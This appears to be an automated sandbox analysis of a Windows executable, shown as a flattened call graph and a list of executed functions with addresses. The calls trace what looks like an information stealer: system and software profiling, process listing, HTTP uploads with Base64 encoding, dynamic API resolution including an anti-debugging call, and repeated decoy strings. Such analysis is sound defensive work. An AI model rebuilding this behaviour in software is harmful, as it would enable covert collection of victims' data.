15051->15052 15053 551d24 15052->15053 15054 55a8a0 lstrcpy 15053->15054 15055 551d2d 15054->15055 15056 55a9b0 4 API calls 15055->15056 15057 551d4c 15056->15057 15058 55a8a0 lstrcpy 15057->15058 15059 551d55 15058->15059 15060 55a9b0 4 API calls 15059->15060 15061 551d75 15060->15061 15062 55a8a0 lstrcpy 15061->15062 15063 551d7e 15062->15063 15064 5578e0 3 API calls 15063->15064 15065 551d8e 15064->15065 15066 55a9b0 4 API calls 15065->15066 15067 551d9e 15066->15067 15068 55a8a0 lstrcpy 15067->15068 15069 551da7 15068->15069 15070 55a9b0 4 API calls 15069->15070 15071 551dc6 15070->15071 15072 55a8a0 lstrcpy 15071->15072 15073 551dcf 15072->15073 15074 55a9b0 4 API calls 15073->15074 15075 551df0 15074->15075 15076 55a8a0 lstrcpy 15075->15076 15077 551df9 15076->15077 15736 557980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15077->15736 15080 55a9b0 4 API calls 15081 551e19 15080->15081 15082 55a8a0 lstrcpy 15081->15082 15083 551e22 15082->15083 15084 55a9b0 4 API calls 15083->15084 15085 551e41 15084->15085 15086 55a8a0 lstrcpy 15085->15086 15087 551e4a 15086->15087 15088 55a9b0 4 API calls 15087->15088 15089 551e6b 15088->15089 15090 55a8a0 lstrcpy 15089->15090 15091 551e74 15090->15091 15738 557a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15091->15738 15094 55a9b0 4 API calls 15095 551e94 15094->15095 15096 55a8a0 lstrcpy 15095->15096 15097 551e9d 15096->15097 15098 55a9b0 4 API calls 15097->15098 15099 551ebc 15098->15099 15100 55a8a0 lstrcpy 15099->15100 15101 551ec5 15100->15101 15102 55a9b0 4 API calls 15101->15102 15103 551ee5 15102->15103 15104 55a8a0 lstrcpy 15103->15104 15105 551eee 15104->15105 15741 557b00 GetUserDefaultLocaleName 15105->15741 15108 55a9b0 4 API calls 15109 551f0e 15108->15109 15110 55a8a0 lstrcpy 15109->15110 15111 551f17 15110->15111 15112 55a9b0 4 API calls 15111->15112 15113 551f36 15112->15113 15114 55a8a0 lstrcpy 15113->15114 15115 551f3f 15114->15115 15116 55a9b0 4 API calls 15115->15116 15117 551f60 15116->15117 15118 55a8a0 lstrcpy 15117->15118 15119 551f69 15118->15119 15745 557b90 15119->15745 15121 551f80 15122 55a920 3 API calls 15121->15122 15123 551f93 15122->15123 15124 55a8a0 lstrcpy 15123->15124 15125 551f9c 15124->15125 15126 55a9b0 4 API calls 15125->15126 15127 551fc6 15126->15127 15128 55a8a0 lstrcpy 15127->15128 15129 551fcf 15128->15129 15130 55a9b0 4 API calls 15129->15130 15131 551fef 15130->15131 15132 55a8a0 lstrcpy 15131->15132 15133 551ff8 15132->15133 15757 557d80 GetSystemPowerStatus 15133->15757 15136 55a9b0 4 API calls 15137 552018 15136->15137 15138 55a8a0 lstrcpy 15137->15138 15139 552021 15138->15139 15140 55a9b0 4 API calls 15139->15140 15141 552040 15140->15141 15142 55a8a0 lstrcpy 15141->15142 15143 552049 15142->15143 15144 55a9b0 4 API calls 15143->15144 15145 55206a 15144->15145 15146 55a8a0 lstrcpy 15145->15146 15147 552073 15146->15147 15148 55207e GetCurrentProcessId 15147->15148 15759 559470 OpenProcess 15148->15759 15151 55a920 3 API calls 15152 5520a4 15151->15152 15153 55a8a0 lstrcpy 15152->15153 15154 5520ad 15153->15154 15155 55a9b0 4 API calls 15154->15155 15156 5520d7 15155->15156 15157 55a8a0 lstrcpy 15156->15157 15158 5520e0 15157->15158 15159 55a9b0 4 API calls 15158->15159 15160 552100 15159->15160 15161 55a8a0 lstrcpy 15160->15161 15162 552109 15161->15162 15764 557e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15162->15764 15165 55a9b0 4 API calls 15166 552129 15165->15166 15167 55a8a0 lstrcpy 15166->15167 15168 552132 15167->15168 15169 55a9b0 4 API calls 15168->15169 15170 552151 15169->15170 15171 55a8a0 lstrcpy 15170->15171 15172 55215a 15171->15172 15173 55a9b0 4 API calls 15172->15173 15174 55217b 15173->15174 15175 55a8a0 lstrcpy 15174->15175 15176 552184 15175->15176 15768 557f60 15176->15768 15179 55a9b0 4 API calls 15180 5521a4 15179->15180 15181 55a8a0 lstrcpy 15180->15181 15182 5521ad 15181->15182 15183 55a9b0 4 API calls 15182->15183 15184 5521cc 15183->15184 15185 55a8a0 lstrcpy 15184->15185 15186 5521d5 15185->15186 15187 55a9b0 4 API calls 15186->15187 15188 5521f6 15187->15188 15189 55a8a0 lstrcpy 15188->15189 15190 5521ff 15189->15190 15781 557ed0 GetSystemInfo wsprintfA 15190->15781 15193 55a9b0 4 API calls 15194 55221f 15193->15194 15195 55a8a0 lstrcpy 15194->15195 15196 552228 15195->15196 15197 55a9b0 4 API calls 15196->15197 15198 552247 15197->15198 15199 55a8a0 lstrcpy 15198->15199 15200 552250 15199->15200 15201 55a9b0 4 API calls 15200->15201 15202 552270 15201->15202 15203 55a8a0 lstrcpy 15202->15203 15204 552279 15203->15204 15783 558100 GetProcessHeap RtlAllocateHeap 15204->15783 15207 55a9b0 4 API calls 15208 552299 15207->15208 15209 55a8a0 lstrcpy 15208->15209 15210 5522a2 15209->15210 15211 55a9b0 4 API calls 15210->15211 15212 5522c1 15211->15212 15213 55a8a0 lstrcpy 15212->15213 15214 5522ca 15213->15214 15215 55a9b0 4 API calls 15214->15215 15216 5522eb 15215->15216 15217 55a8a0 lstrcpy 15216->15217 15218 5522f4 15217->15218 15789 5587c0 15218->15789 15221 55a920 3 API calls 15222 55231e 15221->15222 15223 55a8a0 lstrcpy 15222->15223 15224 552327 15223->15224 15225 55a9b0 4 API calls 15224->15225 15226 552351 15225->15226 15227 55a8a0 lstrcpy 15226->15227 15228 55235a 15227->15228 15229 55a9b0 4 API calls 15228->15229 15230 55237a 15229->15230 15231 55a8a0 lstrcpy 15230->15231 15232 552383 15231->15232 15233 55a9b0 4 API calls 15232->15233 15234 5523a2 15233->15234 15235 55a8a0 lstrcpy 15234->15235 15236 5523ab 15235->15236 15794 5581f0 15236->15794 15238 5523c2 15239 55a920 3 API calls 15238->15239 15240 5523d5 15239->15240 15241 55a8a0 lstrcpy 15240->15241 15242 5523de 15241->15242 15243 55a9b0 4 API calls 15242->15243 15244 55240a 15243->15244 15245 55a8a0 lstrcpy 15244->15245 15246 552413 15245->15246 15247 55a9b0 4 API calls 15246->15247 15248 552432 15247->15248 15249 55a8a0 lstrcpy 15248->15249 15250 55243b 15249->15250 15251 55a9b0 4 API calls 15250->15251 15252 55245c 15251->15252 15253 55a8a0 lstrcpy 15252->15253 15254 552465 15253->15254 15255 55a9b0 4 API calls 15254->15255 15256 552484 15255->15256 15257 55a8a0 lstrcpy 15256->15257 15258 55248d 15257->15258 15259 55a9b0 4 API calls 15258->15259 15260 5524ae 15259->15260 15261 55a8a0 lstrcpy 15260->15261 15262 5524b7 15261->15262 15802 558320 15262->15802 15264 5524d3 15265 55a920 3 API calls 15264->15265 15266 5524e6 15265->15266 15267 55a8a0 lstrcpy 15266->15267 15268 5524ef 15267->15268 15269 55a9b0 4 API calls 15268->15269 15270 552519 15269->15270 15271 55a8a0 lstrcpy 15270->15271 15272 552522 15271->15272 15273 55a9b0 4 API calls 15272->15273 15274 552543 15273->15274 15275 55a8a0 lstrcpy 15274->15275 15276 55254c 15275->15276 15277 558320 17 API calls 15276->15277 15278 552568 15277->15278 15279 55a920 3 API calls 15278->15279 15280 55257b 15279->15280 15281 55a8a0 lstrcpy 15280->15281 15282 552584 15281->15282 15283 55a9b0 4 API calls 15282->15283 15284 5525ae 15283->15284 15285 55a8a0 lstrcpy 15284->15285 15286 5525b7 15285->15286 15287 55a9b0 4 API calls 15286->15287 15288 5525d6 15287->15288 15289 55a8a0 lstrcpy 15288->15289 15290 5525df 15289->15290 15291 55a9b0 4 API calls 15290->15291 15292 552600 15291->15292 15293 55a8a0 lstrcpy 15292->15293 15294 552609 15293->15294 15838 558680 15294->15838 15296 552620 15297 55a920 3 API calls 15296->15297 15298 552633 15297->15298 15299 55a8a0 lstrcpy 15298->15299 15300 55263c 15299->15300 15301 55265a lstrlen 15300->15301 15302 55266a 15301->15302 15303 55a740 lstrcpy 15302->15303 15304 55267c 15303->15304 15305 541590 lstrcpy 15304->15305 15306 55268d 15305->15306 15848 555190 15306->15848 15308 552699 15308->13740 16036 55aad0 15309->16036 15311 545009 InternetOpenUrlA 15312 545021 15311->15312 15313 5450a0 InternetCloseHandle InternetCloseHandle 15312->15313 15314 54502a InternetReadFile 15312->15314 15315 5450ec 15313->15315 15314->15312 15315->13744 16037 5498d0 15316->16037 15318 550759 15319 55077d 15318->15319 15320 550a38 15318->15320 15323 550799 StrCmpCA 15319->15323 15321 541590 lstrcpy 15320->15321 15322 550a49 15321->15322 16213 550250 15322->16213 15324 550843 15323->15324 15325 5507a8 15323->15325 15330 550865 StrCmpCA 15324->15330 15327 55a7a0 lstrcpy 15325->15327 15329 5507c3 15327->15329 15331 541590 lstrcpy 15329->15331 15332 550874 15330->15332 15368 55096b 15330->15368 15333 55080c 15331->15333 15334 55a740 lstrcpy 15332->15334 15336 55a7a0 lstrcpy 15333->15336 15335 550881 15334->15335 15338 55a9b0 4 API calls 15335->15338 15339 550823 15336->15339 15337 55099c StrCmpCA 15340 550a2d 15337->15340 15341 5509ab 15337->15341 15343 5508ac 15338->15343 15344 55a7a0 lstrcpy 15339->15344 15340->13748 15342 541590 lstrcpy 15341->15342 15345 5509f4 15342->15345 15346 55a920 3 API calls 15343->15346 15347 55083e 15344->15347 15348 55a7a0 lstrcpy 15345->15348 15349 5508b3 15346->15349 16040 54fb00 15347->16040 15351 550a0d 15348->15351 15352 55a9b0 4 API calls 15349->15352 15353 55a7a0 lstrcpy 15351->15353 15354 5508ba 15352->15354 15355 550a28 15353->15355 15356 55a8a0 lstrcpy 15354->15356 15368->15337 15688 55a7a0 lstrcpy 15687->15688 15689 541683 15688->15689 15690 55a7a0 lstrcpy 15689->15690 15691 541695 15690->15691 15692 55a7a0 lstrcpy 15691->15692 15693 5416a7 15692->15693 15694 55a7a0 lstrcpy 15693->15694 15695 5415a3 15694->15695 15695->14571 15697 5447c6 15696->15697 15698 544838 lstrlen 15697->15698 15722 55aad0 15698->15722 15700 544848 InternetCrackUrlA 15701 544867 15700->15701 15701->14648 15703 55a740 lstrcpy 15702->15703 15704 558b74 15703->15704 15705 55a740 lstrcpy 15704->15705 15706 558b82 GetSystemTime 15705->15706 15708 558b99 15706->15708 15707 55a7a0 lstrcpy 15709 558bfc 15707->15709 15708->15707 15709->14663 15711 55a931 15710->15711 15712 55a988 15711->15712 15714 55a968 lstrcpy lstrcat 15711->15714 15713 55a7a0 lstrcpy 15712->15713 15715 55a994 15713->15715 15714->15712 15715->14666 15716->14781 15718 549af9 LocalAlloc 15717->15718 15719 544eee 15717->15719 15718->15719 15720 549b14 CryptStringToBinaryA 15718->15720 15719->14669 15719->14671 15720->15719 15721 549b39 LocalFree 15720->15721 15721->15719 15722->15700 15723->14791 15724->14932 15725->14934 15726->14942 15855 5577a0 15727->15855 15730 5576c6 RegOpenKeyExA 15732 557704 RegCloseKey 15730->15732 15733 5576e7 RegQueryValueExA 15730->15733 15731 551c1e 15731->15024 15732->15731 15733->15732 15735 551c99 15734->15735 15735->15038 15737 551e09 15736->15737 15737->15080 15739 551e84 15738->15739 15740 557a9a wsprintfA 15738->15740 15739->15094 15740->15739 15742 557b4d 15741->15742 15743 551efe 15741->15743 15862 558d20 LocalAlloc CharToOemW 15742->15862 15743->15108 15746 55a740 lstrcpy 15745->15746 15747 557bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15746->15747 15756 557c25 15747->15756 15748 557c46 GetLocaleInfoA 15748->15756 15749 557d18 15750 557d1e LocalFree 15749->15750 15751 557d28 15749->15751 15750->15751 15752 55a7a0 lstrcpy 15751->15752 15754 557d37 15752->15754 15753 55a9b0 lstrcpy lstrlen lstrcpy lstrcat 15753->15756 15754->15121 15755 55a8a0 lstrcpy 15755->15756 15756->15748 15756->15749 15756->15753 15756->15755 15758 552008 15757->15758 15758->15136 15760 5594b5 15759->15760 15761 559493 GetModuleFileNameExA CloseHandle 15759->15761 15762 55a740 lstrcpy 15760->15762 15761->15760 15763 552091 15762->15763 15763->15151 15765 552119 15764->15765 15766 557e68 RegQueryValueExA 15764->15766 15765->15165 15767 557e8e RegCloseKey 15766->15767 15767->15765 15769 557fb9 GetLogicalProcessorInformationEx 15768->15769 15770 557fd8 GetLastError 15769->15770 15774 558029 15769->15774 15777 557fe3 15770->15777 15780 558022 15770->15780 15773 5589f0 2 API calls 15775 552194 15773->15775 15776 5589f0 2 API calls 15774->15776 15775->15179 15778 55807b 15776->15778 15777->15769 15777->15775 15863 5589f0 15777->15863 15866 558a10 GetProcessHeap RtlAllocateHeap 15777->15866 15779 558084 wsprintfA 15778->15779 15778->15780 15779->15775 15780->15773 15780->15775 15782 55220f 15781->15782 15782->15193 15784 5589b0 15783->15784 15785 55814d GlobalMemoryStatusEx 15784->15785 15788 558163 15785->15788 15786 55819b wsprintfA 15787 552289 15786->15787 15787->15207 15788->15786 15790 5587fb GetProcessHeap RtlAllocateHeap wsprintfA 15789->15790 15792 55a740 lstrcpy 15790->15792 15793 55230b 15792->15793 15793->15221 15795 55a740 lstrcpy 15794->15795 15796 558229 15795->15796 15797 558263 15796->15797 15799 55a9b0 lstrcpy lstrlen lstrcpy lstrcat 15796->15799 15801 55a8a0 lstrcpy 15796->15801 15798 55a7a0 lstrcpy 15797->15798 15800 5582dc 15798->15800 15799->15796 15800->15238 15801->15796 15803 55a740 lstrcpy 15802->15803 15804 55835c RegOpenKeyExA 15803->15804 15805 5583d0 15804->15805 15806 5583ae 15804->15806 15808 558613 RegCloseKey 15805->15808 15809 5583f8 RegEnumKeyExA 15805->15809 15807 55a7a0 lstrcpy 15806->15807 15819 5583bd 15807->15819 15812 55a7a0 lstrcpy 15808->15812 15810 55843f wsprintfA RegOpenKeyExA 15809->15810 15811 55860e 15809->15811 15813 558485 RegCloseKey RegCloseKey 15810->15813 15814 5584c1 RegQueryValueExA 15810->15814 15811->15808 15812->15819 15817 55a7a0 lstrcpy 15813->15817 15815 558601 RegCloseKey 15814->15815 15816 5584fa lstrlen 15814->15816 15815->15811 15816->15815 15818 558510 15816->15818 15817->15819 15820 55a9b0 4 API calls 15818->15820 15819->15264 15821 558527 15820->15821 15822 55a8a0 lstrcpy 15821->15822 15823 558533 15822->15823 15824 55a9b0 4 API calls 15823->15824 15825 558557 15824->15825 15826 55a8a0 lstrcpy 15825->15826 15827 558563 15826->15827 15828 55856e RegQueryValueExA 15827->15828 15828->15815 15829 5585a3 15828->15829 15830 55a9b0 4 API calls 15829->15830 15831 5585ba 15830->15831 15832 55a8a0 lstrcpy 15831->15832 15833 5585c6 15832->15833 15834 55a9b0 4 API calls 15833->15834 15835 5585ea 15834->15835 15836 55a8a0 lstrcpy 15835->15836 15837 5585f6 15836->15837 15837->15815 15839 55a740 lstrcpy 15838->15839 15840 5586bc CreateToolhelp32Snapshot Process32First 15839->15840 15841 55875d CloseHandle 15840->15841 15842 5586e8 Process32Next 15840->15842 15843 55a7a0 lstrcpy 15841->15843 15842->15841 15847 5586fd 15842->15847 15846 558776 15843->15846 15844 55a9b0 lstrcpy lstrlen lstrcpy lstrcat 15844->15847 15845 55a8a0 lstrcpy 15845->15847 15846->15296 15847->15842 15847->15844 15847->15845 15849 55a7a0 lstrcpy 15848->15849 15850 5551b5 15849->15850 15851 541590 lstrcpy 15850->15851 15852 5551c6 15851->15852 15867 545100 15852->15867 15854 5551cf 15854->15308 15858 557720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15855->15858 15857 5576b9 15857->15730 15857->15731 15859 557765 RegQueryValueExA 15858->15859 15860 557780 RegCloseKey 15858->15860 15859->15860 15861 557793 15860->15861 15861->15857 15862->15743 15864 558a0c 15863->15864 15865 5589f9 GetProcessHeap HeapFree 15863->15865 15864->15777 15865->15864 15866->15777 15868 55a7a0 lstrcpy 15867->15868 15869 545119 15868->15869 15870 5447b0 2 API calls 15869->15870 15871 545125 15870->15871 16027 558ea0 15871->16027 15873 545184 15874 545192 lstrlen 15873->15874 15875 5451a5 15874->15875 15876 558ea0 4 API calls 15875->15876 15877 5451b6 15876->15877 15878 55a740 lstrcpy 15877->15878 15879 5451c9 15878->15879 15880 55a740 lstrcpy 15879->15880 15881 5451d6 15880->15881 15882 55a740 lstrcpy 15881->15882 15883 5451e3 15882->15883 15884 55a740 lstrcpy 15883->15884 15885 5451f0 15884->15885 15886 55a740 lstrcpy 15885->15886 15887 5451fd InternetOpenA StrCmpCA 15886->15887 15888 54522f 15887->15888 15889 5458c4 InternetCloseHandle 15888->15889 15890 558b60 3 API calls 15888->15890 15896 5458d9 ctype 15889->15896 15891 54524e 15890->15891 15892 55a920 3 API calls 15891->15892 15893 545261 15892->15893 15894 55a8a0 lstrcpy 15893->15894 15895 54526a 15894->15895 15897 55a9b0 4 API calls 15895->15897 15900 55a7a0 lstrcpy 15896->15900 15898 5452ab 15897->15898 15899 55a920 3 API calls 15898->15899 15901 5452b2 15899->15901 15907 545913 15900->15907 15902 55a9b0 4 API calls 15901->15902 15903 5452b9 15902->15903 15904 55a8a0 lstrcpy 15903->15904 15905 5452c2 15904->15905 15906 55a9b0 4 API calls 15905->15906 15908 545303 15906->15908 15907->15854 15909 55a920 3 API calls 15908->15909 15910 54530a 15909->15910 15911 55a8a0 lstrcpy 15910->15911 15912 545313 15911->15912 15913 545329 InternetConnectA 15912->15913 15913->15889 15914 545359 HttpOpenRequestA 15913->15914 15916 5458b7 InternetCloseHandle 15914->15916 15917 5453b7 15914->15917 15916->15889 15918 55a9b0 4 API calls 15917->15918 15919 5453cb 15918->15919 15920 55a8a0 lstrcpy 15919->15920 15921 5453d4 15920->15921 15922 55a920 3 API calls 15921->15922 15923 5453f2 15922->15923 15924 55a8a0 lstrcpy 15923->15924 15925 5453fb 15924->15925 15926 55a9b0 4 API calls 15925->15926 15927 54541a 15926->15927 15928 55a8a0 lstrcpy 15927->15928 15929 545423 15928->15929 15930 55a9b0 4 API calls 15929->15930 15931 545444 15930->15931 15932 55a8a0 lstrcpy 15931->15932 15933 54544d 15932->15933 15934 55a9b0 4 API calls 15933->15934 15935 54546e 15934->15935 16028 558ead CryptBinaryToStringA 16027->16028 16029 558ea9 16027->16029 16028->16029 16030 558ece GetProcessHeap RtlAllocateHeap 16028->16030 16029->15873 16030->16029 16031 558ef4 ctype 16030->16031 16032 558f05 CryptBinaryToStringA 16031->16032 16032->16029 16036->15311 16279 549880 16037->16279 16039 5498e1 16039->15318 16041 55a740 lstrcpy 16040->16041 16042 54fb16 16041->16042 16214 55a740 lstrcpy 16213->16214 16215 550266 16214->16215 16216 558de0 2 API calls 16215->16216 16217 55027b 16216->16217 16218 55a920 3 API calls 16217->16218 16219 55028b 16218->16219 16220 55a8a0 lstrcpy 16219->16220 16221 550294 16220->16221 16222 55a9b0 4 API calls 16221->16222 16280 54988e 16279->16280 16283 546fb0 16280->16283 16282 5498ad ctype 16282->16039 16286 546d40 16283->16286 16287 546d63 16286->16287 16296 546d59 16286->16296 16302 546530 16287->16302 16291 546dbe 16291->16296 16312 5469b0 16291->16312 16293 546e2a 16294 546ee6 VirtualFree 16293->16294 16293->16296 16300 546ef7 16293->16300 16294->16300 16295 546f41 16295->16296 16299 5589f0 2 API calls 16295->16299 16296->16282 16297 546f26 FreeLibrary 16297->16300 16298 546f38 16301 5589f0 2 API calls 16298->16301 16299->16296 16300->16295 16300->16297 16300->16298 16301->16295 16303 546542 16302->16303 16305 546549 16303->16305 16322 558a10 GetProcessHeap RtlAllocateHeap 16303->16322 16305->16296 16306 546660 16305->16306 16311 54668f VirtualAlloc 16306->16311 16308 546730 16309 546743 VirtualAlloc 16308->16309 16310 54673c 16308->16310 16309->16310 16310->16291 16311->16308 16311->16310 16313 5469c9 16312->16313 16318 5469d5 16312->16318 16314 546a09 LoadLibraryA 16313->16314 16313->16318 16315 546a32 16314->16315 16314->16318 16317 546ae0 16315->16317 16323 558a10 GetProcessHeap RtlAllocateHeap 16315->16323 16317->16318 16320 546ba8 GetProcAddress 16317->16320 16318->16293 16319 546a8b 16319->16318 16321 5589f0 2 API calls 16319->16321 16320->16317 16320->16318 16321->16317 16322->16305 16323->16319

                      Executed Functions

                      Function 00559860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 660 559860-559874 call 559750 663 559a93-559af2 LoadLibraryA * 5 660->663 664 55987a-559a8e call 559780 GetProcAddress * 21 660->664 666 559af4-559b08 GetProcAddress 663->666 667 559b0d-559b14 663->667 664->663 666->667 669 559b46-559b4d 667->669 670 559b16-559b41 GetProcAddress * 2 667->670 671 559b4f-559b63 GetProcAddress 669->671 672 559b68-559b6f 669->672 670->669 671->672 673 559b71-559b84 GetProcAddress 672->673 674 559b89-559b90 672->674 673->674 675 559bc1-559bc2 674->675 676 559b92-559bbc GetProcAddress * 2 674->676 676->675
                      APIs
                      • GetProcAddress.KERNEL32(76210000,01021680), ref: 005598A1
                      • GetProcAddress.KERNEL32(76210000,01021710), ref: 005598BA
                      • GetProcAddress.KERNEL32(76210000,01021698), ref: 005598D2
                      • GetProcAddress.KERNEL32(76210000,01021770), ref: 005598EA
                      • GetProcAddress.KERNEL32(76210000,01021788), ref: 00559903
                      • GetProcAddress.KERNEL32(76210000,01028928), ref: 0055991B
                      • GetProcAddress.KERNEL32(76210000,010154E8), ref: 00559933
                      • GetProcAddress.KERNEL32(76210000,01015448), ref: 0055994C
                      • GetProcAddress.KERNEL32(76210000,010217A0), ref: 00559964
                      • GetProcAddress.KERNEL32(76210000,01021518), ref: 0055997C
                      • GetProcAddress.KERNEL32(76210000,010216B0), ref: 00559995
                      • GetProcAddress.KERNEL32(76210000,01021530), ref: 005599AD
                      • GetProcAddress.KERNEL32(76210000,010156C8), ref: 005599C5
                      • GetProcAddress.KERNEL32(76210000,01021548), ref: 005599DE
                      • GetProcAddress.KERNEL32(76210000,010215D8), ref: 005599F6
                      • GetProcAddress.KERNEL32(76210000,010156E8), ref: 00559A0E
                      • GetProcAddress.KERNEL32(76210000,01021638), ref: 00559A27
                      • GetProcAddress.KERNEL32(76210000,01021650), ref: 00559A3F
                      • GetProcAddress.KERNEL32(76210000,01015468), ref: 00559A57
                      • GetProcAddress.KERNEL32(76210000,01021800), ref: 00559A70
                      • GetProcAddress.KERNEL32(76210000,01015688), ref: 00559A88
                      • LoadLibraryA.KERNEL32(010217E8,?,00556A00), ref: 00559A9A
                      • LoadLibraryA.KERNEL32(01021818,?,00556A00), ref: 00559AAB
                      • LoadLibraryA.KERNEL32(01021878,?,00556A00), ref: 00559ABD
                      • LoadLibraryA.KERNEL32(01021830,?,00556A00), ref: 00559ACF
                      • LoadLibraryA.KERNEL32(010218A8,?,00556A00), ref: 00559AE0
                      • GetProcAddress.KERNEL32(75B30000,01021848), ref: 00559B02
                      • GetProcAddress.KERNEL32(751E0000,01021860), ref: 00559B23
                      • GetProcAddress.KERNEL32(751E0000,01021890), ref: 00559B3B
                      • GetProcAddress.KERNEL32(76910000,01028D10), ref: 00559B5D
                      • GetProcAddress.KERNEL32(75670000,01015488), ref: 00559B7E
                      • GetProcAddress.KERNEL32(77310000,01028A18), ref: 00559B9F
                      • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00559BB6
                      Strings
                      • NtQueryInformationProcess, xrefs: 00559BAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: NtQueryInformationProcess
                      • API String ID: 2238633743-2781105232
                      • Opcode ID: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
                      • Instruction ID: 20cf7de71441e090b42239d53a9037580b2980235055d27f3fc788ab4f19a7f6
                      • Opcode Fuzzy Hash: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
                      • Instruction Fuzzy Hash: CAA16BB5580240BFF345EFA8ED889563BF9F79C701734C51BA605C3224D63DA852EB2A
                      Function 005445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 764 5445c0-544695 RtlAllocateHeap 781 5446a0-5446a6 764->781 782 5446ac-54474a 781->782 783 54474f-5447a9 VirtualProtect 781->783 782->781
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0054460F
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0054479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054466D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054477B
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445D2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544713
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544617
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446AC
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544638
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544765
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445E8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544657
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544683
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445DD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446CD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446D8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446C2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446B7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544770
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445F3
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544729
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445C7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544734
